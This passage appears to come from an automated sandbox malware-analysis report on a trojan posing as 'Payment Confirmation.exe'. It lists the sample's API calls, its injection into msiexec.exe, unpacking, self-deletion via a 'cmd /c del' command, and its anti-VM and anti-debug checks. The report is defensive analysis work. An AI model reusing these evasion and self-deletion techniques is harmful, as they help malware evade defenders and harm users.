          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00452FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 044EB150 appears 32 times
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_004185D0 NtCreateFile,
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_00418680 NtReadFile,
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_00418700 NtClose,
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_004187B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045295D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045296D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0452B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045298F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045298A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0452AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045299D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045295F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0452A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0452A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0452A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045297A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004685D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00468680 NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00468700 NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004685CA NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046867A NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00468623 NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004686FA NtClose,
          Source: Payment Confirmation.exe, 00000001.00000003.361229670.000000000F196000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment Confirmation.exe
          Source: Payment Confirmation.exe, 00000004.00000002.438024069.0000000000C0F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment Confirmation.exe
          Source: Payment Confirmation.exe, 00000004.00000002.438309815.0000000000E6F000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs Payment Confirmation.exe
          Source: Payment Confirmation.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
          Source: Payment Confirmation.exeVirustotal: Detection: 24%
          Source: Payment Confirmation.exeReversingLabs: Detection: 20%
          Source: C:\Users\user\Desktop\Payment Confirmation.exeFile read: C:\Users\user\Desktop\Payment Confirmation.exeJump to behavior
          Source: Payment Confirmation.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Payment Confirmation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Payment Confirmation.exe 'C:\Users\user\Desktop\Payment Confirmation.exe'
          Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess created: C:\Users\user\Desktop\Payment Confirmation.exe 'C:\Users\user\Desktop\Payment Confirmation.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Confirmation.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess created: C:\Users\user\Desktop\Payment Confirmation.exe 'C:\Users\user\Desktop\Payment Confirmation.exe'
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Confirmation.exe'
          Source: C:\Users\user\Desktop\Payment Confirmation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\Payment Confirmation.exeFile created: C:\Users\user\AppData\Local\Temp\nse1E08.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@11/8
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_00402053 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\Payment Confirmation.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3800:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: msiexec.pdb source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Payment Confirmation.exe, 00000001.00000003.364311124.000000000F080000.00000004.00000001.sdmp, Payment Confirmation.exe, 00000004.00000002.437196803.0000000000960000.00000040.00000001.sdmp, msiexec.exe, 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Payment Confirmation.exe, msiexec.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\Payment Confirmation.exeUnpacked PE file: 4.2.Payment Confirmation.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1000A525 push ecx; ret
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041B87C push eax; ret
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041B812 push eax; ret
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041B81B push eax; ret
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041CBE6 push dword ptr [2E339416h]; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0453D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046B87C push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046B812 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046B81B push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046CBE6 push dword ptr [2E339416h]; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046B7C5 push eax; ret
          Source: C:\Users\user\Desktop\Payment Confirmation.exeFile created: C:\Users\user\AppData\Local\Temp\nsp1E48.tmp\nawgsdqut.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: /c del 'C:\Users\user\Desktop\Payment Confirmation.exe'
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: /c del 'C:\Users\user\Desktop\Payment Confirmation.exe'
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_10008856 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Payment Confirmation.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Payment Confirmation.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 1908Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 2880Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_00405E93 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_00402671 FindFirstFileA,
          Source: explorer.exe, 00000005.00000000.379906764.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000000.418633743.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.414579080.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.379906764.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.414579080.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.379564727.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.379564727.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.418633743.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000005.00000000.370640534.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_10009418 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_10009418 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_100098E2 GetProcessHeap,
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1001A402 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1001A616 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1001A6C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1001A706 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1001A744 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04500050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04500050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04567016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04567016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04567016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04566C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04566C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04566C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04566C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04566CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04566CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04566CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04563884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04563884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04507D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04523D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04563540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0456A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04514D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04514D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04514D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04504120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04504120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04504120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04504120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04504120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04598DF1 mov eax, dword ptr fs:[00000030h]
